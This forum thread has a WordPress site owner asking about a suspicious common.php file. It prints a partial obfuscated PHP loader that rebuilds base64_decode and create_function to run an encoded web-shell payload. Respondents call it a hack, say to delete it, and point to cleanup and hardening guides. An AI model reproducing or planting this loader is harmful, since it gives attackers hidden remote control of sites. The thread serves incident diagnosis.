# corrupted / hacked common.php file?

Tags: wordpress

I am having issues with one of my wordpress sites. (constantly login out users and not letting people log in)

My hosting think the route is the common.php files (/public_html/wp-content/common.php )

Can anyone shed any light on what the files is actually doing? Can I just delete it and will WordPress generate a new file?

common.php code:

```
    <?php

$alphabet = ".hyib/;dq4ux9*zjmclp3_r80)t(vakng1s2foe75w6";
$string = "Cmdsb2JhbCAkYXV0aF9wYXNzLCRjb2xvciwkZGVmYXVsdF9hY3Rpb24sJGRlZmF1bHRfdXNlX2FqYXgsJGRlZmF1bHRfY2hhcnNldCwkc29ydDsKZ2xvYmFsICRjd2QsJG9zLCRzYWZlX21vZGUsICRpbjsKCiRhdXRoX3Bhc3MgPSAnZGU0OTA5YzUxZWZiNjZlNTgwYzMyZTk5NTFlZGI1ZG
```

*I've had to cut out a lot of the code here as it was over the character limit (abot 90,000!!)

```
J10gPSAkZGVmYXVsdF9hY3Rpb247CgllbHNlCgkJJF9QT1NUWydhJ10gPSAnU2VjSW5mbyc7CmlmKCAhZW1wdHkoJF9QT1NUWydhJ10pICYmIGZ1bmN0aW9uX2V4aXN0cygnYWN0aW9uJyAuICRfUE9TVFsnYSddKSApCgljYWxsX3VzZXJfZnVuYygnYWN0aW9uJyAuICRfUE9TVFsnYSddKTsKZXhpdDsKCg==";
    $array_name = "";
    foreach([4,29,34,38,42,9,21,7,38,17,37,7,38] as $t){
       $array_name .= $alphabet[$t];
    }
    $a = strrev("noi"."tcnuf"."_eta"."erc");
    $f = $a("", $array_name($string));
    $f();
```

Thanks in advance

Rich

Comment: Yes it looks like your website has been hacked. Probably there's an `eval` somewhere that run this code once it's decrypted. You might want to restore from an earlier backup.

Answer (score 2, accepted):

**Delete** the file.
It is not a part of the WordPress install or uprade package. I would assume that the file is malicious and that your hosting account/personal machine/login credentials have been compromised or something like that.

***This is the standard support doc referred to in this case:*** https://codex.wordpress.org/FAQ_My_site_was_hacked  
**Then once your site is clean:** 
http://codex.wordpress.org/Hardening_WordPress

Comment: Thanks for the quick response, I will remove the file now and see if it clear up the issues we have been having.

Comment: You could use online malware scanners. Perhaps a plugin like `Wordfence` to check if there are more infected files.

Comment: Cheers, I have iThemes Securtiy so will run another scan now

Comment: Could this file have been taking users passwords then? or what was the file supposed to do?